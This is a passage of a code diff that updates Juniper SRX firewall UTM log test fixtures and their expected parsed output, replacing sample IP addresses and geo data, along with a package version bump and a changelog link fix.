+<12>1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@67.43.156.15 source-address="192.168.1.100" source-port="58071" destination-address="67.43.156.13" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
+<12>1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@67.43.156.15 source-address="67.43.156.13" source-port="80" destination-address="67.43.156.12" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"]
+<14>1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="58974" destination-address="67.43.156.14" destination-port="443" session-id="16297" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Information_Technology" reason="BY_SITE_REPUTATION_MODERATELY_SAFE" profile="WCF1" url="datawrapper.dwcdn.net" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="0"]
+<12>1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="59075" destination-address="67.43.156.13" destination-port="443" session-id="16490" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Advertisements" reason="BY_SITE_REPUTATION_SUSPICIOUS" profile="WCF1" url="dsp.adfarm1.adition.com" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="3"]
+<12>1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@67.43.156.15 source-zone="trust" destination-zone="untrust" source-address="67.43.156.13" source-port="80" destination-address="10.1.1.100" destination-port="58954" profile-name="Custom-Sophos-Profile" filename="download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar" action="BLOCKED" reason="exceeding maximum content size" error-code="7" username="N/A" roles="N/A"]
diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-utm.log-expected.json b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-utm.log-expected.json
index 39ffc643d35..7ddd99dbc81 100644
--- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-utm.log-expected.json
+++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-utm.log-expected.json
@@ -3,7 +3,7 @@
 {
 "server": {
 "port": 80,
-"ip": "175.16.199.1"
+"ip": "67.43.156.13"
 },
 "log": {
 "level": "warning"
@@ -11,31 +11,25 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "source": { - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, "port": 58071, "user": { "name": "user01" }, - "ip": "1.128.3.4" + "ip": "192.168.1.100" }, "juniper": { "srx": { @@ -71,18 +65,18 @@ "www.baidu.com" ], "ip": [ - "1.128.3.4", - "175.16.199.1" + "192.168.1.100", + "67.43.156.13" ] }, "client": { "port": 58071, - "ip": "1.128.3.4" + "ip": "192.168.1.100" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760750640Z", - "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.86 source-address=\"1.128.3.4\" source-port=\"58071\" destination-address=\"175.16.199.1\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:16:22.252523600Z", + "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-address=\"192.168.1.100\" source-port=\"58071\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "web_filter", "category": [ @@ -100,7 +94,7 @@ { "server": { "port": 80, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "log": { "level": "warning" 
@@ -108,31 +102,25 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "source": { - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, "port": 1402, "user": { "name": "user02" }, - "ip": "1.128.3.4" + "ip": "10.10.10.50" }, "juniper": { "srx": { @@ -167,18 +155,18 @@ "www.checkpoint.com" ], "ip": [ - "1.128.3.4", - "175.16.199.1" + "10.10.10.50", + "67.43.156.13" ] }, "client": { "port": 1402, - "ip": "1.128.3.4" + "ip": "10.10.10.50" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760781337Z", - "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.86 source-address=\"1.128.3.4\" source-port=\"1402\" destination-address=\"175.16.199.1\" destination-port=\"80\" category=\"N/A\" reason=\"BY_OTHER\" profile=\"wf-profile\" url=\"www.checkpoint.com\" obj=\"/css/homepage2012.css\" username=\"user02\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:16:22.252604700Z", + "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-address=\"10.10.10.50\" source-port=\"1402\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"N/A\" reason=\"BY_OTHER\" profile=\"wf-profile\" url=\"www.checkpoint.com\" obj=\"/css/homepage2012.css\" username=\"user02\" roles=\"N/A\"]", "kind": "event", "category": [ "network" @@ -193,7 +181,7 @@ { "server": { "port": 47095, - "ip": "175.16.199.1" + "ip": "67.43.156.12" }, "log": { "level": "warning" 
@@ -201,28 +189,34 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 47095, - "ip": "175.16.199.1" + "ip": "67.43.156.12" }, "source": { - "port": 80, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "port": 80, + "ip": "67.43.156.13" }, "juniper": { "srx": { 
@@ -259,18 +253,18 @@ "EICAR-Test-File" ], "ip": [ - "1.128.3.4", - "175.16.199.1" + "67.43.156.13", + "67.43.156.12" ] }, "client": { "port": 80, - "ip": "1.128.3.4" + "ip": "67.43.156.13" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760860095Z", - "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@2636.1.1.1.2.40 source-address=\"1.128.3.4\" source-port=\"80\" destination-address=\"175.16.199.1\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", + "ingested": "2021-12-10T10:16:22.252608600Z", + "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@67.43.156.15 source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"67.43.156.12\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", "kind": "alert", "action": "virus_detected", "category": [ @@ -288,7 +282,7 @@ { "server": { "port": 33578, - "ip": "175.16.199.1" + "ip": "67.43.156.12" }, "log": { "level": "warning" 
@@ -296,28 +290,34 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 33578, - "ip": "175.16.199.1" + "ip": "67.43.156.12" }, "source": { - "port": 80, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "port": 80, + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -345,18 +345,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "175.16.199.1" + "67.43.156.14", + "67.43.156.12" ] }, "client": { "port": 80, - "ip": "1.128.3.4" + "ip": "67.43.156.14" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760870525Z", - "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@2636.1.1.1.2.40 source-address=\"1.128.3.4\" source-port=\"80\" destination-address=\"175.16.199.1\" destination-port=\"33578\" filename=\"www.google.com/\" error-code=\"14\" error-message=\"scan engine is not ready\"]", + "ingested": "2021-12-10T10:16:22.252613900Z", + "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"80\" destination-address=\"67.43.156.12\" destination-port=\"33578\" filename=\"www.google.com/\" error-code=\"14\" error-message=\"scan engine is not ready\"]", "kind": "event", "category": [ "network" @@ -371,7 +371,7 @@ { "server": { "port": 51727, - "ip": "175.16.199.1" + "ip": "67.43.156.12" }, "log": { "level": "warning" 
@@ -379,28 +379,22 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 51727, - "ip": "175.16.199.1" + "ip": "67.43.156.12" }, "source": { "port": 80, - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, - "ip": "1.128.3.4" + "ip": "10.2.1.101" }, "juniper": { "srx": { @@ -426,18 +420,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "175.16.199.1" + "10.2.1.101", + "67.43.156.12" ] }, "client": { "port": 80, - "ip": "1.128.3.4" + "ip": "10.2.1.101" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760892266Z", - "original": "\u003c12\u003e1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@2636.1.1.1.2.40 source-address=\"1.128.3.4\" source-port=\"80\" destination-address=\"175.16.199.1\" destination-port=\"51727\" filename=\"10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz\"]", + "ingested": "2021-12-10T10:16:22.252619600Z", + "original": "\u003c12\u003e1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@67.43.156.15 source-address=\"10.2.1.101\" source-port=\"80\" destination-address=\"67.43.156.12\" destination-port=\"51727\" filename=\"10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz\"]", "kind": "event", "category": [ "network" @@ -471,26 +465,20 @@ "user01" ], "ip": [ - "1.128.3.4" + "10.10.10.1" ] }, "log": { "level": "informational" }, "client": { - "ip": "1.128.3.4" + "ip": "10.10.10.1" }, "source": { "user": { "name": "user01" }, - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, - "ip": "1.128.3.4" + "ip": "10.10.10.1" }, "juniper": { "srx": { 
@@ -503,8 +491,8 @@ }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:32.760897966Z", - "original": "\u003c14\u003e1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@2636.1.1.1.2.86 source-zone=\"trust\" destination-zone=\"untrust\" source-name=\"N/A\" source-address=\"1.128.3.4\" profile-name=\"antispam01\" action=\"drop\" reason=\"Match local blacklist\" username=\"user01\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:16:22.252625500Z", + "original": "\u003c14\u003e1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-name=\"N/A\" source-address=\"10.10.10.1\" profile-name=\"antispam01\" action=\"drop\" reason=\"Match local blacklist\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "antispam_filter", "category": [ @@ -525,39 +513,21 @@ { "server": { "port": 80, - "ip": "175.16.199.1" + "ip": "192.168.100.2" }, "log": { "level": "informational" }, "destination": { - "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", - "location": { - "lon": 125.3228, - "lat": 43.88 - } - }, "port": 80, - "ip": "175.16.199.1" + "ip": "192.168.100.2" }, "source": { - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, "port": 58071, "user": { "name": "user01@testuser.com" }, - "ip": "1.128.3.4" + "ip": "192.168.2.3" }, "juniper": { "srx": { 
@@ -598,18 +568,18 @@ "user01@testuser.com" ], "ip": [ - "1.128.3.4", - "175.16.199.1" + "192.168.2.3", + "192.168.100.2" ] }, "client": { "port": 58071, - "ip": "1.128.3.4" + "ip": "192.168.2.3" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:32.760902084Z", - "original": "\u003c14\u003e1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@2636.1.1.1.2.86 source-zone=\"untrust\" destination-zone=\"trust\" protocol=\"http\" source-address=\"1.128.3.4\" source-port=\"58071\" destination-address=\"175.16.199.1\" destination-port=\"80\" profile-name=\"content02\" action=\"drop\" reason=\"blocked due to file extension block list\" username=\"user01@testuser.com\" roles=\"N/A\" filename=\"test.cmd\"]", + "ingested": "2021-12-10T10:16:22.252630500Z", + "original": "\u003c14\u003e1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@67.43.156.15 source-zone=\"untrust\" destination-zone=\"trust\" protocol=\"http\" source-address=\"192.168.2.3\" source-port=\"58071\" destination-address=\"192.168.100.2\" destination-port=\"80\" profile-name=\"content02\" action=\"drop\" reason=\"blocked due to file extension block list\" username=\"user01@testuser.com\" roles=\"N/A\" filename=\"test.cmd\"]", "kind": "alert", "action": "content_filter", "category": [ @@ -627,7 +597,7 @@ { "server": { "port": 80, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "log": { "level": "warning" 
@@ -635,31 +605,25 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "source": { - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, "port": 58071, "user": { "name": "user01" }, - "ip": "1.128.3.4" + "ip": "192.168.1.100" }, "juniper": { "srx": { @@ -695,18 +659,18 @@ "www.baidu.com" ], "ip": [ - "1.128.3.4", - "175.16.199.1" + "192.168.1.100", + "67.43.156.13" ] }, "client": { "port": 58071, - "ip": "1.128.3.4" + "ip": "192.168.1.100" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760905410Z", - "original": "\u003c12\u003e1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@2636.1.1.1.2.86 source-address=\"1.128.3.4\" source-port=\"58071\" destination-address=\"175.16.199.1\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:16:22.252636100Z", + "original": "\u003c12\u003e1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@67.43.156.15 source-address=\"192.168.1.100\" source-port=\"58071\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "web_filter", "category": [ @@ -724,7 +688,7 @@ { "server": { "port": 47095, - "ip": "175.16.199.1" + "ip": "67.43.156.12" }, "log": { "level": "warning" 
@@ -732,28 +696,34 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 47095, - "ip": "175.16.199.1" + "ip": "67.43.156.12" }, "source": { - "port": 80, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "port": 80, + "ip": "67.43.156.13" }, "juniper": { "srx": { 
@@ -790,18 +760,18 @@ "EICAR-Test-File" ], "ip": [ - "1.128.3.4", - "175.16.199.1" + "67.43.156.13", + "67.43.156.12" ] }, "client": { "port": 80, - "ip": "1.128.3.4" + "ip": "67.43.156.13" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760908616Z", - "original": "\u003c12\u003e1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@2636.1.1.1.2.40 source-address=\"1.128.3.4\" source-port=\"80\" destination-address=\"175.16.199.1\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", + "ingested": "2021-12-10T10:16:22.252640600Z", + "original": "\u003c12\u003e1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@67.43.156.15 source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"67.43.156.12\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", "kind": "alert", "action": "virus_detected", "category": [ @@ -819,7 +789,7 @@ { "server": { "port": 443, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -827,28 +797,22 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 443, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "source": { "port": 58974, - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, - "ip": "1.128.3.4" + "ip": "10.1.1.100" }, "juniper": { "srx": { 
@@ -888,18 +852,18 @@ "datawrapper.dwcdn.net" ], "ip": [ - "1.128.3.4", - "175.16.199.1" + "10.1.1.100", + "67.43.156.14" ] }, "client": { "port": 58974, - "ip": "1.128.3.4" + "ip": "10.1.1.100" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:32.760925328Z", - "original": "\u003c14\u003e1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.129 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"1.128.3.4\" source-port=\"58974\" destination-address=\"175.16.199.1\" destination-port=\"443\" session-id=\"16297\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Information_Technology\" reason=\"BY_SITE_REPUTATION_MODERATELY_SAFE\" profile=\"WCF1\" url=\"datawrapper.dwcdn.net\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"0\"]", + "ingested": "2021-12-10T10:16:22.252646200Z", + "original": "\u003c14\u003e1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"10.1.1.100\" source-port=\"58974\" destination-address=\"67.43.156.14\" destination-port=\"443\" session-id=\"16297\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Information_Technology\" reason=\"BY_SITE_REPUTATION_MODERATELY_SAFE\" profile=\"WCF1\" url=\"datawrapper.dwcdn.net\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"0\"]", "risk_score": 0.0, "kind": "event", "category": [ @@ -915,7 +879,7 @@ { "server": { "port": 443, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "log": { "level": "warning" 
@@ -923,28 +887,22 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 443, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "source": { "port": 59075, - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, - "ip": "1.128.3.4" + "ip": "10.1.1.100" }, "juniper": { "srx": { 
@@ -984,18 +942,18 @@ "dsp.adfarm1.adition.com" ], "ip": [ - "1.128.3.4", - "175.16.199.1" + "10.1.1.100", + "67.43.156.13" ] }, "client": { "port": 59075, - "ip": "1.128.3.4" + "ip": "10.1.1.100" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760929926Z", - "original": "\u003c12\u003e1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.129 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"1.128.3.4\" source-port=\"59075\" destination-address=\"175.16.199.1\" destination-port=\"443\" session-id=\"16490\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Advertisements\" reason=\"BY_SITE_REPUTATION_SUSPICIOUS\" profile=\"WCF1\" url=\"dsp.adfarm1.adition.com\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"3\"]", + "ingested": "2021-12-10T10:16:22.252650400Z", + "original": "\u003c12\u003e1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"10.1.1.100\" source-port=\"59075\" destination-address=\"67.43.156.13\" destination-port=\"443\" session-id=\"16490\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Advertisements\" reason=\"BY_SITE_REPUTATION_SUSPICIOUS\" profile=\"WCF1\" url=\"dsp.adfarm1.adition.com\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"3\"]", "risk_score": 3.0, "kind": "alert", "action": "web_filter", 
@@ -1014,36 +972,30 @@ { "server": { "port": 58954, - "ip": "175.16.199.1" + "ip": "10.1.1.100" }, "log": { "level": "warning" }, "destination": { + "port": 58954, + "ip": "10.1.1.100" + }, + "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, - "port": 58954, - "ip": "175.16.199.1" - }, - "source": { - "port": 80, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "port": 80, + "ip": "67.43.156.13" }, "juniper": { "srx": { 
@@ -1079,18 +1031,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "175.16.199.1" + "67.43.156.13", + "10.1.1.100" ] }, "client": { "port": 80, - "ip": "1.128.3.4" + "ip": "67.43.156.13" }, "event": { "severity": 12, - "ingested": "2021-11-25T09:37:32.760933894Z", - "original": "\u003c12\u003e1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@2636.1.1.1.2.129 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"1.128.3.4\" source-port=\"80\" destination-address=\"175.16.199.1\" destination-port=\"58954\" profile-name=\"Custom-Sophos-Profile\" filename=\"download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar\" action=\"BLOCKED\" reason=\"exceeding maximum content size\" error-code=\"7\" username=\"N/A\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:16:22.252656300Z", + "original": "\u003c12\u003e1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"10.1.1.100\" destination-port=\"58954\" profile-name=\"Custom-Sophos-Profile\" filename=\"download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar\" action=\"BLOCKED\" reason=\"exceeding maximum content size\" error-code=\"7\" username=\"N/A\" roles=\"N/A\"]", "kind": "event", "category": [ "network" diff --git a/packages/juniper_srx/manifest.yml b/packages/juniper_srx/manifest.yml index 21851b756c1..15fd2e16957 100644 --- a/packages/juniper_srx/manifest.yml +++ b/packages/juniper_srx/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: juniper_srx title: Juniper SRX -version: 1.0.0 +version: 1.0.1 description: Collect logs from Juniper SRX devices with Elastic Agent. categories: ["network", "security"] release: ga 
diff --git a/packages/microsoft/changelog.yml b/packages/microsoft/changelog.yml index a8224e4b069..e148fe8e1e2 100644 --- a/packages/microsoft/changelog.yml +++ b/packages/microsoft/changelog.yml @@ -3,7 +3,7 @@ changes: - description: Add deprecation message in readme. type: enhancement - link: https://github.com/elastic/integrations/pull/ + link: https://github.com/elastic/integrations/pull/2327 - version: "0.8.3" changes: - description: Update title and description. Mark as deprecated in description. diff --git a/packages/microsoft_dhcp/_dev/deploy/docker/sample_logs/test-dhcp.log b/packages/microsoft_dhcp/_dev/deploy/docker/sample_logs/test-dhcp.log index 1327a595206..08d51f57759 100644 --- a/packages/microsoft_dhcp/_dev/deploy/docker/sample_logs/test-dhcp.log +++ b/packages/microsoft_dhcp/_dev/deploy/docker/sample_logs/test-dhcp.log 
